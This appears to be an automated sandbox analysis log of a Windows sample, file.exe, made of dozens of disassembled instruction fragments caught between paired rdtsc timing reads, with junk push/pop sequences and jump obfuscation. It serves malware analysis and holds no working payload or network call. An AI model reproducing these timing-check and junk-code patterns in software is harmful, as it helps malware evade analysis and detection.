Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11547E6 second address: 11547F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5E9072B896h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1154C6A second address: 1154C6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1154F51 second address: 1154F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115EAB6 second address: 115EAC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F5E907EB776h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115EAC8 second address: 115EAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F5E9072B896h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D5E7 second address: 115D5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jc 00007F5E907EB776h 0x0000000c jg 00007F5E907EB776h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D5FA second address: 115D606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F5E9072B896h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D606 second address: 115D60C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D60C second address: 115D63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E9072B8A8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push esi 0x0000000f ja 00007F5E9072B896h 0x00000015 pop esi 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D63A second address: 115D64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E907EB776h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D64B second address: 115D64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D8D7 second address: 115D8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D8DB second address: 115D8EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F5E9072B896h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115DB81 second address: 115DB88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115DB88 second address: 115DB91 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E15E second address: 115E168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5E907EB776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E168 second address: 115E191 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E9072B896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F5E9072B8AFh 0x00000010 js 00007F5E9072B896h 0x00000016 jmp 00007F5E9072B8A3h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D2F8 second address: 115D315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D315 second address: 115D31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D31B second address: 115D347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5E907EB786h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E907EB77Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D347 second address: 115D34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116270F second address: 1162713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116454F second address: 1164567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Fh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1164567 second address: 116456D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DF83F second address: 10DF846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1167044 second address: 116704E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116704E second address: 1167052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11671B6 second address: 11671BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1167312 second address: 116731B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116731B second address: 1167323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1167323 second address: 1167332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1169A2B second address: 1169A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E907EB783h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1169A42 second address: 1169A4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117219C second address: 11721B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F5E907EB781h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11721B2 second address: 11721B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11721B8 second address: 11721BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E2D54 second address: 10E2D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5E9072B8A7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F5E9072B89Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170A8F second address: 1170A9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170A9B second address: 1170AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170AA1 second address: 1170AAB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E907EB776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170AAB second address: 1170AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170AB1 second address: 1170AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170AB7 second address: 1170AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5E9072B896h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170BE6 second address: 1170BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5E907EB776h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F5E907EB776h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170BFB second address: 1170C01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170C01 second address: 1170C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170C0B second address: 1170C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5E9072B896h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170C15 second address: 1170C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170C19 second address: 1170C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170C29 second address: 1170C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E907EB77Dh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170D7D second address: 1170D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E9072B89Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170EDF second address: 1170EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E907EB77Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117103C second address: 1171075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F5E9072B89Ch 0x0000000b jnl 00007F5E9072B896h 0x00000011 pop ecx 0x00000012 push ebx 0x00000013 jmp 00007F5E9072B89Dh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E9072B8A5h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171075 second address: 1171079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11255C6 second address: 11255CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11255CB second address: 11255E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F5E907EB77Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11255E1 second address: 11255E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11255E6 second address: 1125659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D3AC2h] 0x0000000e mov ebx, dword ptr [ebp+12489739h] 0x00000014 or dword ptr [ebp+12457667h], ebx 0x0000001a add eax, ebx 0x0000001c mov dx, 2B3Fh 0x00000020 sub dl, FFFFFF9Dh 0x00000023 nop 0x00000024 pushad 0x00000025 je 00007F5E907EB778h 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d jo 00007F5E907EB77Ch 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push esi 0x00000037 pushad 0x00000038 popad 0x00000039 pop esi 0x0000003a pop eax 0x0000003b nop 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F5E907EB778h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 push 00000004h 0x00000058 movzx edx, ax 0x0000005b nop 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f jo 00007F5E907EB776h 0x00000065 push edx 0x00000066 pop edx 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125659 second address: 112566A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112566A second address: 1125674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5E907EB776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176C10 second address: 1176C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176C16 second address: 1176C30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F5E907EB77Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11760C8 second address: 11760CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117634B second address: 117636A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E907EB783h 0x00000008 jl 00007F5E907EB77Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1176641 second address: 1176645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11767C4 second address: 11767CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11767CB second address: 11767DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F5E9072B896h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11767DC second address: 11767E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117E8C6 second address: 117E8CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117E8CA second address: 117E8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117E8D5 second address: 117E8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117E8DB second address: 117E8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F5E907EB77Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117E8F5 second address: 117E903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jl 00007F5E9072B896h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117C9F5 second address: 117C9FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117CB4E second address: 117CB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117CCB6 second address: 117CCBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117CF4F second address: 117CF65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E9072B8A0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117CF65 second address: 117CF8B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F5E907EB77Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F5E907EB77Ah 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117D4EA second address: 117D4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5E9072B896h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117D77A second address: 117D782 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117D782 second address: 117D7A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E9072B89Ch 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F5E9072B896h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117DD9C second address: 117DDA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117DDA0 second address: 117DDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F5E9072B898h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117FF45 second address: 117FF4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117FF4B second address: 117FF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117FF55 second address: 117FF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117FF59 second address: 117FF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push edi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183D32 second address: 1183D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F5E907EB789h 0x0000000e jmp 00007F5E907EB784h 0x00000013 popad 0x00000014 js 00007F5E907EB778h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jc 00007F5E907EB776h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183D7B second address: 1183D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183D7F second address: 1183D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F5E907EB776h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182E97 second address: 1182EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E9072B8A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1182EAF second address: 1182EC8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E907EB784h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118311B second address: 118311F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118311F second address: 118314A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F5E907EB793h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118314A second address: 1183171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E9072B8A4h 0x00000009 jmp 00007F5E9072B89Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11832F6 second address: 11832FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
